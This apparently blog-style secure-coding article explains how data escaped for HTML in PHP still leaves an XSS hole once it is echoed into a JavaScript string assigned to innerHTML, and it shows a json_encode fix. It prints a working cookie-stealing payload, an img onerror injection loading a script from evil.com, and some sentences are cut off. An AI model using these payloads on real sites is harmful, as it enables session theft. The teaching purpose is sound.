The problem I'll talk about today deals with the different ways in which quotes can be represented in different contexts, in particular, when passing data across language boundaries. Let's look at some code.
<?php $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS); ?> <script> var s = "<?php echo $s; ?>"; var div = document.getElementById("content"); div.innerHTML = s; </script>From the HTML perpective, this code appears clean. Data from the URL parameter
sneeds to be written out to HTML and we're applying a suitable filter to it to make it safe for use in that context. This code would be fine if we were passing the data directly from PHP to HTML, but that's not what we're doing here.
s. The output of our PHP becomes:
What we're doing in the innerHTML assignment is assigning a string to a div's innerHTML property, and then the browser goes ahead and renders that string as if it were HTML. In essence,
innerHTMLis to HTML what
When assigned to the innerHTML, it turns into the following HTML:
<script src="http://evil.com/cookie-steal.js"></script>Fortunately, browsers won't execute script nodes that were added using innerHTML. They will, however execute inline events on elements added through innerHTML, so we do this instead:
\u003cimg+src\u003dblah+onerror\u003d\u0022s=document.createElement(\u0027script\u0027);s.src\u003d\u0027http://evil.com/cookie-steal.js\u0027;document.body.appendChild(s);\u0022\u003e, which translates to the following HTML (indented for readability):
So, what's the fix here?
To think about the fix, we need to think about context, and every place this user data is being used. Depending on the actual use case, our fix may involve just one change, or several changes to the above code. One change is mandatory though:
<?php $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS); ?> <script> var s = <?php echo json_encode($s); ?> var div = document.getElementById("content"); div.innerHTML = s; </script>The
\\u00xx. Note that
addslashesis insufficient as it does not escape newline characters which are valid inside PHP strings.
Two things to learn from this:
- When passing untrusted data across language boundaries, you may need to sanitize it multiple times
- innerHTML is the eval of HTML